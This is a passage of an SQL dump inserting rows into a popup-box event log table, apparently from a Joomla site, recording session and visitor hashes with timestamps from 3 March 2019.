(66763, 'ce3effeac97c3db5eb1d7db24a248fcf', '503a514a8daa32a7', 0, 2, 1, '2019-03-03 05:59:09'),
(66764, 'a221f023a47981c67d5f0e47f3505cb0', 'c6da2a6f9b230084', 0, 2, 1, '2019-03-03 06:00:10'),
(66765, '1652fca5ffef4463ae3cb513f257eaac', '1c68b977b911188c', 0, 2, 1, '2019-03-03 06:01:36'),
(66766, 'b6bf88bc50d3def5f8d6848a6c4f2188', '471e356b82ae8f37', 0, 2, 1, '2019-03-03 06:01:39'),
(66767, 'a221f023a47981c67d5f0e47f3505cb0', 'c6da2a6f9b230084', 0, 2, 1, '2019-03-03 06:01:55'),
(66768, '1652fca5ffef4463ae3cb513f257eaac', '1c68b977b911188c', 0, 2, 1, '2019-03-03 06:01:57'),
(66769, 'b6bf88bc50d3def5f8d6848a6c4f2188', '471e356b82ae8f37', 0, 2, 1, '2019-03-03 06:02:02'),
(66770, 'd25ef7d3c64b5a99ac5f0daa8707b72e', '99ddf52c8ba9b467', 0, 2, 1, '2019-03-03 06:02:24'),
(66771, '70c4634a8e2c5ccda850afb945d73538', 'd4f262d62ac01a85', 0, 2, 1, '2019-03-03 06:02:25'),
(66772, 'a221f023a47981c67d5f0e47f3505cb0', 'c6da2a6f9b230084', 0, 2, 1, '2019-03-03 06:02:45'),
(66773, 'a221f023a47981c67d5f0e47f3505cb0', 'c6da2a6f9b230084', 0, 2, 1, '2019-03-03 06:03:17'),
(66774, '9f8e69c67496444ddadc3c7581dc96f6', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-03 06:04:10'),
(66775, 'a221f023a47981c67d5f0e47f3505cb0', 'c6da2a6f9b230084', 0, 2, 1, '2019-03-03 06:04:20'),
(66776, 'de98a646502e814a68c31c4cf419fe5e', '83045f1d58961832', 0, 2, 1, '2019-03-03 06:04:51'),
(66777, 'ce3effeac97c3db5eb1d7db24a248fcf', '503a514a8daa32a7', 0, 2, 1, '2019-03-03 06:04:55'),
(66778, 'b6bf88bc50d3def5f8d6848a6c4f2188', '471e356b82ae8f37', 0, 2, 1, '2019-03-03 06:05:01'),
(66779, '6bcf0b0d0e68a15e5554775f9130c929', 'e240ee9ebc06f135', 0, 2, 1, '2019-03-03 06:06:43'),
(66780, '6bcf0b0d0e68a15e5554775f9130c929', 'e240ee9ebc06f135', 0, 2, 1, '2019-03-03 06:07:01'),
(66781, '6bcf0b0d0e68a15e5554775f9130c929', 'e240ee9ebc06f135', 0, 2, 1, '2019-03-03 06:07:41'),
(66782, '4ab169d3a6582f6b0f56c9942e15684b', 'e3163f1046dc4449', 0, 2, 1, '2019-03-03 06:08:11'),
(66783, 'a221f023a47981c67d5f0e47f3505cb0', 'c6da2a6f9b230084', 0, 2, 1, '2019-03-03 06:08:32'),
(66784, 'a221f023a47981c67d5f0e47f3505cb0', 'c6da2a6f9b230084', 0, 2, 1, '2019-03-03 06:09:27'),
(66785, 'a221f023a47981c67d5f0e47f3505cb0', 'c6da2a6f9b230084', 0, 2, 1, '2019-03-03 06:10:08'),
(66786, '6bcf0b0d0e68a15e5554775f9130c929', 'e240ee9ebc06f135', 0, 2, 1, '2019-03-03 06:10:25'),
(66787, 'a221f023a47981c67d5f0e47f3505cb0', 'c6da2a6f9b230084', 0, 2, 1, '2019-03-03 06:10:30'),
(66788, 'e54f4e2c0c27bfb9468878a6ffbd6c89', '3d33f34339255cb3', 0, 2, 1, '2019-03-03 06:10:51'),
(66789, '6bcf0b0d0e68a15e5554775f9130c929', 'e240ee9ebc06f135', 0, 2, 1, '2019-03-03 06:11:04'),
(66790, 'a221f023a47981c67d5f0e47f3505cb0', 'c6da2a6f9b230084', 0, 2, 1, '2019-03-03 06:11:30'),
(66791, 'a221f023a47981c67d5f0e47f3505cb0', 'c6da2a6f9b230084', 0, 2, 1, '2019-03-03 06:12:27'),
(66792, 'a221f023a47981c67d5f0e47f3505cb0', 'c6da2a6f9b230084', 0, 2, 1, '2019-03-03 06:13:03'),
(66793, 'ce3effeac97c3db5eb1d7db24a248fcf', '503a514a8daa32a7', 0, 2, 1, '2019-03-03 06:13:27'),
(66794, 'f89d8f0b79c1122d8135ffbe6c9e897f', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-03 06:13:31'),
(66795, '58f48dd1a9b9e1f696689f0c0c10be29', 'b2e78912dacced42', 0, 2, 1, '2019-03-03 06:14:04'),
(66796, 'ce3effeac97c3db5eb1d7db24a248fcf', '503a514a8daa32a7', 0, 2, 1, '2019-03-03 06:14:19'),
(66797, 'b5f4c305159e589fa742bd6ed6a9e395', 'b9974a919762d897', 0, 2, 1, '2019-03-03 06:15:00'),
(66798, 'a3a73e0c54d61e93fc63d9bf6c7fce56', 'e2b3fae8bfe73d6e', 0, 2, 1, '2019-03-03 06:15:13'),
(66799, 'ce3effeac97c3db5eb1d7db24a248fcf', '503a514a8daa32a7', 0, 2, 1, '2019-03-03 06:15:19'),
(66800, 'b5f4c305159e589fa742bd6ed6a9e395', 'b9974a919762d897', 0, 2, 1, '2019-03-03 06:15:23'),
(66801, 'a3a73e0c54d61e93fc63d9bf6c7fce56', 'e2b3fae8bfe73d6e', 0, 2, 1, '2019-03-03 06:15:23'),
(66802, 'cb46c703a9a97442371b1a7d26a5389d', 'c046255ef15f2d3c', 0, 2, 1, '2019-03-03 06:15:31'),
(66803, 'a3a73e0c54d61e93fc63d9bf6c7fce56', 'e2b3fae8bfe73d6e', 0, 2, 1, '2019-03-03 06:15:35'),
(66804, 'dc95ad10ac6be751592903b5f7b75cf3', 'fe961668877fa513', 0, 2, 1, '2019-03-03 06:16:08'),
(66805, 'dc95ad10ac6be751592903b5f7b75cf3', 'fe961668877fa513', 0, 2, 1, '2019-03-03 06:16:19'),
(66806, '64a41f22d5f67f2c9e66f6740444af8e', '575b738595cdb2f5', 0, 2, 1, '2019-03-03 06:16:49'),
(66807, 'a221f023a47981c67d5f0e47f3505cb0', 'c6da2a6f9b230084', 0, 2, 1, '2019-03-03 06:17:11'),
(66808, 'b2b40b7f28262d1678d82a0d7201131e', 'dace6e0c219330fc', 0, 2, 1, '2019-03-03 06:18:02'),
(66809, 'dc95ad10ac6be751592903b5f7b75cf3', 'fe961668877fa513', 0, 2, 1, '2019-03-03 06:18:09'),
(66810, 'b2b40b7f28262d1678d82a0d7201131e', 'dace6e0c219330fc', 0, 2, 1, '2019-03-03 06:18:29'),
(66811, 'a221f023a47981c67d5f0e47f3505cb0', 'c6da2a6f9b230084', 0, 2, 1, '2019-03-03 06:18:31'),
(66812, 'dc95ad10ac6be751592903b5f7b75cf3', 'fe961668877fa513', 0, 2, 1, '2019-03-03 06:18:48'),
(66813, '50b36bce51d7903864fd20112a067cc7', 'f6643a1a7bcf9bc1', 0, 2, 1, '2019-03-03 06:18:51'),
(66814, 'b2b40b7f28262d1678d82a0d7201131e', 'dace6e0c219330fc', 0, 2, 1, '2019-03-03 06:19:00'),
(66815, '66178b2a8c86d6528725309ec3fc75df', 'dba49dcafdc2b991', 0, 2, 1, '2019-03-03 06:19:20'),
(66816, '54b22e0e154414b39d0ab6d6005cbd80', 'a5a8a5573ddadfcc', 0, 2, 1, '2019-03-03 06:20:21'),
(66817, '54b22e0e154414b39d0ab6d6005cbd80', 'a5a8a5573ddadfcc', 0, 2, 1, '2019-03-03 06:20:25'),
(66818, 'f606e97a84e14d771e77ca31f69b02a1', '90bc60b36908c706', 0, 2, 1, '2019-03-03 06:20:30'),
(66819, 'b2b40b7f28262d1678d82a0d7201131e', 'dace6e0c219330fc', 0, 2, 1, '2019-03-03 06:20:34'),
(66820, '64a41f22d5f67f2c9e66f6740444af8e', '575b738595cdb2f5', 0, 2, 1, '2019-03-03 06:21:06'),
(66821, 'dc95ad10ac6be751592903b5f7b75cf3', 'fe961668877fa513', 0, 2, 1, '2019-03-03 06:21:07'),
(66822, '54b22e0e154414b39d0ab6d6005cbd80', 'a5a8a5573ddadfcc', 0, 2, 1, '2019-03-03 06:21:08'),
(66823, '30a1b4344b997ae755760a3fd3327445', '76ed9cbc7a5d0626', 0, 2, 1, '2019-03-03 06:21:27'),
(66824, '66178b2a8c86d6528725309ec3fc75df', 'dba49dcafdc2b991', 0, 2, 1, '2019-03-03 06:21:37'),
(66825, '30a1b4344b997ae755760a3fd3327445', '76ed9cbc7a5d0626', 0, 2, 1, '2019-03-03 06:22:12'),
(66826, 'b2b40b7f28262d1678d82a0d7201131e', 'dace6e0c219330fc', 0, 2, 1, '2019-03-03 06:22:13'),
(66827, '2baf71bb6e2e5a67396133f32db035d6', 'ec18b138536ee06e', 0, 2, 1, '2019-03-03 06:22:16'),
(66828, '2baf71bb6e2e5a67396133f32db035d6', 'ec18b138536ee06e', 0, 2, 1, '2019-03-03 06:22:19'),
(66829, '70678961ace2fe2bd1bf08cbfae7c1d9', '402692e46d0378b1', 0, 2, 1, '2019-03-03 06:22:31'),
(66830, '9f8e69c67496444ddadc3c7581dc96f6', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-03 06:22:35'),
(66831, '1652fca5ffef4463ae3cb513f257eaac', '1c68b977b911188c', 0, 2, 1, '2019-03-03 06:23:13'),
(66832, '1652fca5ffef4463ae3cb513f257eaac', '1c68b977b911188c', 0, 2, 1, '2019-03-03 06:23:35'),
(66833, 'a09217abf9d730f3d929886cabdf5bfd', '8e0589df61cad931', 0, 2, 1, '2019-03-03 06:24:07'),
(66834, 'a09217abf9d730f3d929886cabdf5bfd', '8e0589df61cad931', 0, 2, 1, '2019-03-03 06:24:21'),
(66835, '674b9dd07b2d3290bf1fd312441bfb10', '324d0c5c1f480926', 0, 2, 1, '2019-03-03 06:26:17'),
(66836, 'ce3effeac97c3db5eb1d7db24a248fcf', '503a514a8daa32a7', 0, 2, 1, '2019-03-03 06:26:34'),
(66837, 'd10495d96f1734b939d8822f2969b6c6', '801bbc3399e37d8a', 0, 2, 1, '2019-03-03 06:26:59'),
(66838, 'd10495d96f1734b939d8822f2969b6c6', '801bbc3399e37d8a', 0, 2, 1, '2019-03-03 06:27:45'),
(66839, 'dc95ad10ac6be751592903b5f7b75cf3', 'fe961668877fa513', 0, 2, 1, '2019-03-03 06:28:09'),
(66840, '872d7142fa4217c950cca479b8a53fc0', '2956fd1c8bef6f2e', 0, 2, 1, '2019-03-03 06:30:51'),
(66841, '872d7142fa4217c950cca479b8a53fc0', '2956fd1c8bef6f2e', 0, 2, 1, '2019-03-03 06:31:42'),
(66842, '872d7142fa4217c950cca479b8a53fc0', '2956fd1c8bef6f2e', 0, 2, 1, '2019-03-03 06:31:56'),
(66843, 'b0ddf7bf200428304696b147a285d032', 'e707db78ed0816e9', 0, 2, 1, '2019-03-03 06:32:17'),
(66844, 'c9c513e0199555d383ddd3191558b1b7', '22b54f72e1f4a652', 0, 2, 1, '2019-03-03 06:32:23'),
(66845, 'b0ddf7bf200428304696b147a285d032', 'e707db78ed0816e9', 0, 2, 1, '2019-03-03 06:32:37'),
(66846, 'b0ddf7bf200428304696b147a285d032', 'e707db78ed0816e9', 0, 2, 1, '2019-03-03 06:32:58'),
(66847, '680927570a8bd5aa69609dd02f6eac9d', 'a7a7b4bbea82be21', 0, 2, 1, '2019-03-03 06:33:02'),
(66848, '6eda6657cdedbb262568959ff139920d', '0bf16c319bd2f666', 0, 2, 1, '2019-03-03 06:33:06'),
(66849, '5054db726cd28a0465dc388c94649aa0', 'a0748bc8bd0e6678', 0, 2, 1, '2019-03-03 06:33:11'),
(66850, '680927570a8bd5aa69609dd02f6eac9d', 'a7a7b4bbea82be21', 0, 2, 1, '2019-03-03 06:33:17'),
(66851, '8d19b41bf25eeedbc8af61160eeecb15', 'e6d68f41a23e8fb4', 0, 2, 1, '2019-03-03 06:33:18'),
(66852, '5054db726cd28a0465dc388c94649aa0', 'a0748bc8bd0e6678', 0, 2, 1, '2019-03-03 06:33:19'),
(66853, '5054db726cd28a0465dc388c94649aa0', 'a0748bc8bd0e6678', 0, 2, 1, '2019-03-03 06:33:53'),
(66854, '7b774e1b889c4cf3772fe01897eeecef', '83f3f9050d0f12fd', 0, 2, 1, '2019-03-03 06:34:05'),
(66855, 'ce3effeac97c3db5eb1d7db24a248fcf', '503a514a8daa32a7', 0, 2, 1, '2019-03-03 06:34:23'),
(66856, '8d19b41bf25eeedbc8af61160eeecb15', 'e6d68f41a23e8fb4', 0, 2, 1, '2019-03-03 06:34:27'),
(66857, '680927570a8bd5aa69609dd02f6eac9d', 'a7a7b4bbea82be21', 0, 2, 1, '2019-03-03 06:35:13'),
(66858, '7b774e1b889c4cf3772fe01897eeecef', '83f3f9050d0f12fd', 0, 2, 1, '2019-03-03 06:35:27'),
(66859, '41c166276128f7f983572f20f2bd1c81', 'dace6e0c219330fc', 0, 2, 1, '2019-03-03 06:36:21'),
(66860, '5930e7ac2949056494d382200d7bca08', 'a9e5f8b31cb955e7', 0, 2, 1, '2019-03-03 06:36:58'),
(66861, '218e7617808d8f6fc005ccdeeb714d7a', '644acf1110495d92', 0, 2, 1, '2019-03-03 06:37:03'),
(66862, '218e7617808d8f6fc005ccdeeb714d7a', '644acf1110495d92', 0, 2, 1, '2019-03-03 06:37:20'),
(66863, '7b774e1b889c4cf3772fe01897eeecef', '83f3f9050d0f12fd', 0, 2, 1, '2019-03-03 06:38:14'),
(66864, '7b774e1b889c4cf3772fe01897eeecef', '83f3f9050d0f12fd', 0, 2, 1, '2019-03-03 06:38:27'),
(66865, 'ef94ac7b3674d66d7d0f643f7720f5f7', '7501b42c35accff7', 0, 2, 1, '2019-03-03 06:39:15'),
(66866, 'a3a73e0c54d61e93fc63d9bf6c7fce56', 'e2b3fae8bfe73d6e', 0, 2, 1, '2019-03-03 06:40:06'),
(66867, '494d04a7e9cdb1daca13af180c4b3ead', 'e544297cd084dc88', 0, 2, 1, '2019-03-03 06:40:09'),
(66868, '1052075df56fe0f9a53968f973b85095', '9861b1e7c71e23cc', 0, 2, 1, '2019-03-03 06:40:34'),
(66869, 'a3a73e0c54d61e93fc63d9bf6c7fce56', 'e2b3fae8bfe73d6e', 0, 2, 1, '2019-03-03 06:40:38'),
(66870, '6ea3be9afde51311315f38dbdc36c540', '835d7fb0e246f1f2', 0, 2, 1, '2019-03-03 06:40:43'),
(66871, 'b1489fa7ad22560830f2fed909a24ef6', '7ee294c1040cc2e1', 0, 2, 1, '2019-03-03 06:40:48'),
(66872, '1052075df56fe0f9a53968f973b85095', '9861b1e7c71e23cc', 0, 2, 1, '2019-03-03 06:40:49'),
(66873, '7b774e1b889c4cf3772fe01897eeecef', '83f3f9050d0f12fd', 0, 2, 1, '2019-03-03 06:41:02'),
(66874, '7b774e1b889c4cf3772fe01897eeecef', '83f3f9050d0f12fd', 0, 2, 1, '2019-03-03 06:41:06'),
(66875, '9773583f20c03fc20ccf7346b76f45fa', 'c4c9002176fd8f74', 0, 2, 1, '2019-03-03 06:41:11'),
(66876, 'ce3effeac97c3db5eb1d7db24a248fcf', '503a514a8daa32a7', 0, 2, 1, '2019-03-03 06:41:14'),
(66877, '9773583f20c03fc20ccf7346b76f45fa', 'c4c9002176fd8f74', 0, 2, 1, '2019-03-03 06:41:40'),
(66878, 'c46dad121db7a38bdcad9fa9bd70330a', '20683e7ff6f02d30', 0, 2, 1, '2019-03-03 06:42:09'),
(66879, 'c46dad121db7a38bdcad9fa9bd70330a', '20683e7ff6f02d30', 0, 2, 1, '2019-03-03 06:42:18'),
(66880, '7b774e1b889c4cf3772fe01897eeecef', '83f3f9050d0f12fd', 0, 2, 1, '2019-03-03 06:42:25'),
(66881, '7b774e1b889c4cf3772fe01897eeecef', '83f3f9050d0f12fd', 0, 2, 1, '2019-03-03 06:42:40'),
(66882, 'dc95ad10ac6be751592903b5f7b75cf3', 'fe961668877fa513', 0, 2, 1, '2019-03-03 06:42:45'),
(66883, 'ce3effeac97c3db5eb1d7db24a248fcf', '503a514a8daa32a7', 0, 2, 1, '2019-03-03 06:44:45'),
(66884, 'ce3effeac97c3db5eb1d7db24a248fcf', '503a514a8daa32a7', 0, 2, 1, '2019-03-03 06:45:32'),
(66885, '30a1b4344b997ae755760a3fd3327445', '76ed9cbc7a5d0626', 0, 2, 1, '2019-03-03 06:45:35'),
(66886, 'ce3effeac97c3db5eb1d7db24a248fcf', '503a514a8daa32a7', 0, 2, 1, '2019-03-03 06:45:58'),
(66887, 'aed745a240de2dff16c6d4a891129055', 'd872af680fb479a0', 0, 2, 1, '2019-03-03 06:46:09'),
(66888, 'a221f023a47981c67d5f0e47f3505cb0', 'c6da2a6f9b230084', 0, 2, 1, '2019-03-03 06:46:26'),
(66889, 'c9893075cbefdca9c6d0150b10bdafb5', '196ae7616c94df27', 0, 2, 1, '2019-03-03 06:46:26'),
(66890, 'c9893075cbefdca9c6d0150b10bdafb5', '196ae7616c94df27', 0, 2, 1, '2019-03-03 06:46:37'),
(66891, 'b6bf88bc50d3def5f8d6848a6c4f2188', '471e356b82ae8f37', 0, 2, 1, '2019-03-03 06:47:16'),
(66892, '48826b89f9a33e38ebc4a252a868ae72', '91d21119de46096c', 0, 2, 1, '2019-03-03 06:47:32'),
(66893, 'aed745a240de2dff16c6d4a891129055', 'd872af680fb479a0', 0, 2, 1, '2019-03-03 06:47:40'),
(66894, '48826b89f9a33e38ebc4a252a868ae72', '91d21119de46096c', 0, 2, 1, '2019-03-03 06:47:46'),
(66895, '48826b89f9a33e38ebc4a252a868ae72', '91d21119de46096c', 0, 2, 1, '2019-03-03 06:47:56'),
(66896, '48826b89f9a33e38ebc4a252a868ae72', '91d21119de46096c', 0, 2, 1, '2019-03-03 06:48:02'),
(66897, '494d04a7e9cdb1daca13af180c4b3ead', 'e544297cd084dc88', 0, 2, 1, '2019-03-03 06:48:24'),
(66898, 'aed745a240de2dff16c6d4a891129055', 'd872af680fb479a0', 0, 2, 1, '2019-03-03 06:48:35'),
(66899, '72d04b076e98f1b9be668f05d79ce233', '12ed21842ec29d17', 0, 2, 1, '2019-03-03 06:49:01'),
(66900, '48826b89f9a33e38ebc4a252a868ae72', '91d21119de46096c', 0, 2, 1, '2019-03-03 06:49:17'),
(66901, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2019-03-03 06:49:25'),
(66902, '41ed36b9eb41a844c4184de12d38265f', '3de88ff4581dab27', 0, 2, 1, '2019-03-03 06:49:30');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(66903, '48826b89f9a33e38ebc4a252a868ae72', '91d21119de46096c', 0, 2, 1, '2019-03-03 06:49:51'),
(66904, 'acea049b6bd465689a4febb0b935cac5', 'b250c4bde35c1eef', 0, 2, 1, '2019-03-03 06:49:58'),
(66905, '48826b89f9a33e38ebc4a252a868ae72', '91d21119de46096c', 0, 2, 1, '2019-03-03 06:50:10'),
(66906, 'ce3effeac97c3db5eb1d7db24a248fcf', '503a514a8daa32a7', 0, 2, 1, '2019-03-03 06:50:12'),
(66907, '6cb52dd1fe32d4d16584c2bc70508a7f', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-03 06:50:16'),
(66908, '6eda6657cdedbb262568959ff139920d', '0bf16c319bd2f666', 0, 2, 1, '2019-03-03 06:50:26'),
(66909, '48826b89f9a33e38ebc4a252a868ae72', '91d21119de46096c', 0, 2, 1, '2019-03-03 06:50:29'),
(66910, '48826b89f9a33e38ebc4a252a868ae72', '91d21119de46096c', 0, 2, 1, '2019-03-03 06:50:39'),
(66911, '6cb52dd1fe32d4d16584c2bc70508a7f', '1d1658c97bef6ed6', 0, 2, 1, '2019-03-03 06:50:48'),
(66912, 'de1bd65a8727ceefa8be20eb61201a8e', 'df27b9a2919a8206', 0, 2, 1, '2019-03-03 06:50:56'),
(66913, '0f9771f9414eac111f4924cece5d5f6b', 'd04e7300519a9043', 0, 2, 1, '2019-03-03 06:51:00'),
(66914, 'e8f4da89be36f4bf0fbf9b9c0add3057', '74cc567947434c7e', 0, 2, 1, '2019-03-03 06:51:02'),
(66915, '3e3ea168a3b9d6f1428a2ea3008c2e60', 'df2f194cea195593', 0, 2, 1, '2019-03-03 06:51:04'),
(66916, 'b50346d5ea4153a8ae54435ea2b865f1', 'e6d68f41a23e8fb4', 0, 2, 1, '2019-03-03 06:51:56'),
(66917, 'b50346d5ea4153a8ae54435ea2b865f1', 'e6d68f41a23e8fb4', 0, 2, 1, '2019-03-03 06:52:11'),
(66918, 'de1bd65a8727ceefa8be20eb61201a8e', 'df27b9a2919a8206', 0, 2, 1, '2019-03-03 06:52:14'),
(66919, '0f9771f9414eac111f4924cece5d5f6b', 'd04e7300519a9043', 0, 2, 1, '2019-03-03 06:52:17'),
(66920, '7667146773089536a081bb9dd0c773c9', '6b23921a131ff80b', 0, 2, 1, '2019-03-03 06:52:17'),
(66921, '61ee5f61aa6dd1bd9a2dccc8c85d0382', '22f43a16a511f701', 0, 2, 1, '2019-03-03 06:52:22'),
(66922, 'b6bf88bc50d3def5f8d6848a6c4f2188', '471e356b82ae8f37', 0, 2, 1, '2019-03-03 06:52:43'),
(66923, '0f9771f9414eac111f4924cece5d5f6b', 'd04e7300519a9043', 0, 2, 1, '2019-03-03 06:52:51'),
(66924, 'b6bf88bc50d3def5f8d6848a6c4f2188', '471e356b82ae8f37', 0, 2, 1, '2019-03-03 06:52:57'),
(66925, '61ee5f61aa6dd1bd9a2dccc8c85d0382', '22f43a16a511f701', 0, 2, 1, '2019-03-03 06:53:02'),
(66926, '0f9771f9414eac111f4924cece5d5f6b', 'd04e7300519a9043', 0, 2, 1, '2019-03-03 06:53:11'),
(66927, '674b9dd07b2d3290bf1fd312441bfb10', '324d0c5c1f480926', 0, 2, 1, '2019-03-03 06:53:16'),
(66928, 'e77e9c68bc1ea510417ae7c146b65680', '65e1b73cf3be5c3f', 0, 2, 1, '2019-03-03 06:53:22'),
(66929, '7667146773089536a081bb9dd0c773c9', '6b23921a131ff80b', 0, 2, 1, '2019-03-03 06:53:38'),
(66930, '9f8e69c67496444ddadc3c7581dc96f6', 'b4ecb18ba7992a18', 0, 2, 1, '2019-03-03 06:53:48'),
(66931, 'dc95ad10ac6be751592903b5f7b75cf3', 'fe961668877fa513', 0, 2, 1, '2019-03-03 06:53:59'),
(66932, 'e77e9c68bc1ea510417ae7c146b65680', '65e1b73cf3be5c3f', 0, 2, 1, '2019-03-03 06:54:04'),
(66933, '0148c2fdc7a06deccf104201ebf40b6a', 'f19010d8a5f137d0', 0, 2, 1, '2019-03-03 06:54:10'),
(66934, '9773583f20c03fc20ccf7346b76f45fa', 'c4c9002176fd8f74', 0, 2, 1, '2019-03-03 06:54:12'),
(66935, '61ee5f61aa6dd1bd9a2dccc8c85d0382', '22f43a16a511f701', 0, 2, 1, '2019-03-03 06:54:14'),
(66936, 'd10495d96f1734b939d8822f2969b6c6', '801bbc3399e37d8a', 0, 2, 1, '2019-03-03 06:54:24'),
(66937, '83dde4e6ba95abbcaf17bc6dc3609834', 'e3413f2163c4f64a', 0, 2, 1, '2019-03-03 06:54:25'),
(66938, 'd10495d96f1734b939d8822f2969b6c6', '801bbc3399e37d8a', 0, 2, 1, '2019-03-03 06:54:35'),
(66939, 'd72ee62a6d89d137cb7abcfa203d777e', '483313bcaa5a7274', 0, 2, 1, '2019-03-03 06:54:43'),
(66940, '1fac8a0575d5d330192beb42ba1d162d', '338c0977018c306b', 0, 2, 1, '2019-03-03 06:54:44'),
(66941, 'd10495d96f1734b939d8822f2969b6c6', '801bbc3399e37d8a', 0, 2, 1, '2019-03-03 06:54:55'),
(66942, '70678961ace2fe2bd1bf08cbfae7c1d9', '402692e46d0378b1', 0, 2, 1, '2019-03-03 06:55:17'),
(66943, 'd72ee62a6d89d137cb7abcfa203d777e', '483313bcaa5a7274', 0, 2, 1, '2019-03-03 06:55:25'),
(66944, '4ab169d3a6582f6b0f56c9942e15684b', 'e3163f1046dc4449', 0, 2, 1, '2019-03-03 06:55:38'),
(66945, '4ab169d3a6582f6b0f56c9942e15684b', 'e3163f1046dc4449', 0, 2, 1, '2019-03-03 06:55:47'),
(66946, 'ef94ac7b3674d66d7d0f643f7720f5f7', '7501b42c35accff7', 0, 2, 1, '2019-03-03 06:55:58'),
(66947, 'f6c6d07d5a2fc81d1f744b732a728536', 'edfe950d47379572', 0, 2, 1, '2019-03-03 06:57:22'),
(66948, 'f6c6d07d5a2fc81d1f744b732a728536', 'edfe950d47379572', 0, 2, 1, '2019-03-03 06:57:27'),
(66949, 'a87d0c56d76d7c6efa72e2dde16783fe', '22f43a16a511f701', 0, 2, 1, '2019-03-03 06:57:32'),
(66950, 'f6c6d07d5a2fc81d1f744b732a728536', 'edfe950d47379572', 0, 2, 1, '2019-03-03 06:57:47'),
(66951, 'a87d0c56d76d7c6efa72e2dde16783fe', '22f43a16a511f701', 0, 2, 1, '2019-03-03 06:57:55'),
(66952, 'f6c6d07d5a2fc81d1f744b732a728536', 'edfe950d47379572', 0, 2, 1, '2019-03-03 06:57:55'),
(66953, 'a87d0c56d76d7c6efa72e2dde16783fe', '22f43a16a511f701', 0, 2, 1, '2019-03-03 06:58:29'),
(66954, 'ce351f8f76ad0c8909ca9f51c866bb36', 'a57fec11ca8f248f', 0, 2, 1, '2019-03-03 06:58:33'),
(66955, 'a87d0c56d76d7c6efa72e2dde16783fe', '22f43a16a511f701', 0, 2, 1, '2019-03-03 06:58:37'),
(66956, '1652fca5ffef4463ae3cb513f257eaac', '1c68b977b911188c', 0, 2, 1, '2019-03-03 06:59:44'),
(66957, 'cb97f7a546debdd1728a1117b55c44af', '6cf927363315d05d', 0, 2, 1, '2019-03-03 07:00:11'),
(66958, 'cb97f7a546debdd1728a1117b55c44af', '6cf927363315d05d', 0, 2, 1, '2019-03-03 07:00:31'),
(66959, '0f9771f9414eac111f4924cece5d5f6b', 'd04e7300519a9043', 0, 2, 1, '2019-03-03 07:00:54'),
(66960, '0aa2f1e64b7308483c5923e0a20a4383', 'c7d4ce8b0de12339', 0, 2, 1, '2019-03-03 07:01:04'),
(66961, 'c46dad121db7a38bdcad9fa9bd70330a', '20683e7ff6f02d30', 0, 2, 1, '2019-03-03 07:01:10'),
(66962, 'c9893075cbefdca9c6d0150b10bdafb5', '196ae7616c94df27', 0, 2, 1, '2019-03-03 07:01:12'),
(66963, 'e08be16f617140b681bb8cceb85f5d3a', '353e2c8924436e84', 0, 2, 1, '2019-03-03 07:01:59'),
(66964, 'c46dad121db7a38bdcad9fa9bd70330a', '20683e7ff6f02d30', 0, 2, 1, '2019-03-03 07:02:07'),
(66965, 'e08be16f617140b681bb8cceb85f5d3a', '353e2c8924436e84', 0, 2, 1, '2019-03-03 07:02:08'),
(66966, 'e08be16f617140b681bb8cceb85f5d3a', '353e2c8924436e84', 0, 2, 1, '2019-03-03 07:02:42'),
(66967, '41c166276128f7f983572f20f2bd1c81', 'dace6e0c219330fc', 0, 2, 1, '2019-03-03 07:03:02'),
(66968, '72a65237aecb8226c512299fa60cbce1', '66cd2ffd1b716f5a', 0, 2, 1, '2019-03-03 07:04:02'),
(66969, '445431e83941fd362a52bbbde1571f4c', 'ed8fddef90c77d16', 0, 2, 1, '2019-03-03 07:04:32'),
(66970, '72a65237aecb8226c512299fa60cbce1', '66cd2ffd1b716f5a', 0, 2, 1, '2019-03-03 07:05:07'),
(66971, 'cb97f7a546debdd1728a1117b55c44af', '6cf927363315d05d', 0, 2, 1, '2019-03-03 07:05:49'),
(66972, '00f1219e66aa9752bb3a0a0588cc6214', 'e16d5d69344a3f3c', 0, 2, 1, '2019-03-03 07:05:55'),
(66973, '494d04a7e9cdb1daca13af180c4b3ead', 'e544297cd084dc88', 0, 2, 1, '2019-03-03 07:06:18'),
(66974, '00f1219e66aa9752bb3a0a0588cc6214', 'e16d5d69344a3f3c', 0, 2, 1, '2019-03-03 07:06:27'),
(66975, '7b774e1b889c4cf3772fe01897eeecef', '83f3f9050d0f12fd', 0, 2, 1, '2019-03-03 07:08:04'),
(66976, '4cca3f63c84d48c6149f3dab5e298e7a', '0c3b18a297f7fa46', 0, 2, 1, '2019-03-03 07:08:08'),
(66977, '72a65237aecb8226c512299fa60cbce1', '66cd2ffd1b716f5a', 0, 2, 1, '2019-03-03 07:08:27'),
(66978, '25169e32fb5986ad9a2641ac6f7567cd', 'dace6e0c219330fc', 0, 2, 1, '2019-03-03 07:09:29'),
(66979, '25169e32fb5986ad9a2641ac6f7567cd', 'dace6e0c219330fc', 0, 2, 1, '2019-03-03 07:09:50'),
(66980, 'cb97f7a546debdd1728a1117b55c44af', '6cf927363315d05d', 0, 2, 1, '2019-03-03 07:11:14'),
(66981, '00cf27fc79af2e2c83c90c42a36b7a5b', '74aba437eea39f30', 0, 2, 1, '2019-03-03 07:11:28'),
(66982, '4931ecd330c3044cc62156f44a162cd6', '1d9c54d0b37930ed', 0, 2, 1, '2019-03-03 07:13:24'),
(66983, '4931ecd330c3044cc62156f44a162cd6', '1d9c54d0b37930ed', 0, 2, 1, '2019-03-03 07:13:41'),
(66984, 'dc95ad10ac6be751592903b5f7b75cf3', 'fe961668877fa513', 0, 2, 1, '2019-03-03 07:14:33'),
(66985, '7b774e1b889c4cf3772fe01897eeecef', '83f3f9050d0f12fd', 0, 2, 1, '2019-03-03 07:15:25'),
(66986, '4c0f06f32f9e86a7b5e88375a2fc6658', '0530018377078939', 0, 2, 1, '2019-03-03 07:15:31'),
(66987, '4c0f06f32f9e86a7b5e88375a2fc6658', '0530018377078939', 0, 2, 1, '2019-03-03 07:15:39'),
(66988, '4c0f06f32f9e86a7b5e88375a2fc6658', '0530018377078939', 0, 2, 1, '2019-03-03 07:16:22'),
(66989, '58f48dd1a9b9e1f696689f0c0c10be29', 'b2e78912dacced42', 0, 2, 1, '2019-03-03 07:16:51'),
